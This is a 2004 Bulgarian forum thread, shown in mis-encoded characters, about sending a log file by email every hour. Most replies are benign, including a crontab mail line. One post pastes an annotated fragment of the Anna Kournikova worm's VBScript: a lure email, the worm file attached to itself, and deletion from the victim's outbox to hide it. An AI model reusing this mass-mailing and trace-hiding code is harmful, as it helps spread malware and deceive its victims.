Results 1 to 6 of 6
Thread: File íà e-mail - êàê?
Hybrid View
-
9th January 2004 04:08 #1
File íà e-mail - êàê?
Èñêàì äà ðàçáåðà êîé è êàêâî ïðàâè íà êîìïà ìè äîêàòî ìå íÿìà, çàùîòî ùå îòñúñòâàì èçâåñòíî âðåìå. Èìàì ïðîãðàìêà, êîÿòî ïðàâè log çà âñè÷êî, êîåòî ñòàâà ñ êîìïþòúðà. Ìîæå ëè (è êàê) äà èçïðàùàì ïåðåîäè÷íî òîçè log ôàèë íà e-mail?
Èäåÿòà å äà ñòàâà àâòîìàòè÷íî, ïðèìåðíî âñåêè ÷àñ, äàäåíèÿ ôàèë äà ñå ïðàùà íà ìåéëà ìè.
p.s. Ôàèëà å îáèêíîâåí òåêñòîâ ôàèë - blabla.txtMSI K9N SLI (nVIDIA nForce 570); AMD Athlon 64 X2 3800+ @ 4800+ (10 x 300); 2 x A-Data 512 MB DDR2 - 800; MSI NX7300 GT (NVIDIA GeForce 7300 GT) (256 MB/128 bit); Auzen X-Plosion 7.1
-
9th January 2004 07:19 #2Banned
Join Date: Jan:2003
Location: .
Posts: 6,635
crontab -e
è òàì ïèøåø ðåäà
0 * * * * /bin/mail your@email.address < blabla.txt > /dev/null 2>&1
è ñëåä òîâà :x çà äà ãî çàïèøåø è òîâà å. Íà âñåêè êðúãúë ÷àñ ùå òè ãî èçïðàùà íà àäðåñ your@email.address
-
9th January 2004 08:11 #3
str_f
àìà ñåãà çà Win ëè ñòàâà äóìà, èëè çà Linux ??
Robot Arkadash says:
There are alternatives to fighting.
-
9th January 2004 09:24 #4
Òîâà íàäîëó å ÷àñò îò ñîðñà íà âèðóñà Àíà Êóðíèêîâà è ïî òî÷íî òàçè ñâúðçàíà ñ ðàçïðîñòðàíåíèåòî ìó . Òðÿáâà äà ïîëçâàø Outlook è äà èìàø èíñòàëèðàí Windows Scripting Host . Ïèøåø òîâà â ôàéë ñ ðàçøèðåíèå .vbs.
Set Outlook_Object = CreateObject("Outlook.Application")
' comments by me:
' Now we can access Microsoft Outlook functions
' by using the Outlook_Object we created.
Set New_Mail_Object = Outlook_Object.CreateItem(0)
' A new object is created.
' It is a new email with some attributes we can just fill
' with information (like "Single_AddressBook_Entry.Adress" which
' is the email-address of one of the entries in the address book.
' We extracted this from the address book earlier, and we are taking
' one entry after another:
New_Mail_Object.To = "adres"
New_Mail_Object.Subject = "Here you have, ;o)"
New_Mail_Object.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
' So with this three lines we have created the textbody and
' addressed that email.
set Attachement=New_Mail_Object.Attachments
Attachement.Add File_Anna_JPG_VBS.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
' We have now created an attachment space in our new email and
' added the file "AnnaKournikova.jpg.vbs" which has been
' created by the code earlier by just copying itself to hard disk.
New_Mail_Object.DeleteAfterSubmit = True
' To leave no traces in the victims out-box the email will be deleted
' after it was sent to the receipient.
If New_Mail_Object.To <> "" Then New_Mail_Object.Send
' If we actually found a valid email address in the address books
' (there might not be an email stored for everyone in your windows
' address books) the mail will be sent and then deleted from the
' outbox as requested before.EP43-DS3|E5200@3.33|ASUS EN9800GT HB /HTDI/ 512MB|2X2GB 800MHZ CL5 A-DATA|WD2500JB|NEC 4750A|BELINEA 1980S2
-
10th January 2004 00:31 #5
Áëàãîäàðÿ íà âñè÷êè!
entium, òîâà ùå ãî ïðîáâàì âåäíàãà, êîãàòî ñå ïðèáåðà
ï.ñ. Ñòàâà ñúïðîñ çà ÕÐ íå çà Linux. Sorry ÷å íå óòî÷íèõ â íà÷àëîòî.MSI K9N SLI (nVIDIA nForce 570); AMD Athlon 64 X2 3800+ @ 4800+ (10 x 300); 2 x A-Data 512 MB DDR2 - 800; MSI NX7300 GT (NVIDIA GeForce 7300 GT) (256 MB/128 bit); Auzen X-Plosion 7.1
-
10th January 2004 02:17 #6Banned
Join Date: Jan:2003
Location: .
Posts: 6,635
Àç ïúê ãî íàïèñàõ çà IRIX




Reply With Quote
Ïðîáëåìíà R9 280, àðòåôàêòè
7th May 2023, 21:28 in Âèäåîêàðòè